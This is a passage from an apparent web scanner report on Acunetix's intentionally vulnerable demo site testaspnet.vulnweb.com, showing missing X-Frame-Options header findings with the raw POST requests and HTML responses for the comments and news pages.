href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:07 GMT Content-Length: 14360
Response Body - size: 14,360 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKm2I3mCQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJ0OOIIRYqVtGT38Je7OHUSHamD9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 4:42:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a 